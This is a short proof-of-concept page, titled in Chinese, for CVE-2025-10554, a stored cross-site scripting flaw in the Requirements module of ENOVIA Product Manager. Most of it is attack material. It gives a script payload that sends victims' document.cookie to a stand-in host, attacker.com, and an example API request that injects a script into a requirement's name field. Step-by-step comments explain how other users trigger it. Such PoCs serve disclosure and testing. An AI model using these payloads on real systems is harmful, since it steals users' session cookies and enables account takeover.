CVE-2025-10554 ENOVIA Product Manager存储型XSS漏洞

// CVE-2025-10554 PoC - Stored XSS in ENOVIA Product Manager Requirements // This PoC demonstrates the XSS payload injection in Requirements module // XSS Payload - can be injected in Requirements fields var xssPayload = '<script>alert("XSS")</script>'; var xssPayloadCookie = '<script>document.location="https://attacker.com/steal?c="+document.cookie</script>'; // Attack Scenario: // 1. Attacker creates or edits a Requirement in ENOVIA Product Manager // 2. Inject XSS payload in requirement name/description field // 3. When other users view this requirement, the script executes // Example: Creating malicious requirement via API or UI // POST /ENOVIA/api/requirements // { // "name": "Requirement Name<script>alert(document.cookie)</script>", // "description": "Description with XSS payload", // "type": "requirement" // } // The injected script will execute when: // - Users browse the Requirements list // - Users open the affected requirement detail page // - Requirement data is displayed in reports or exports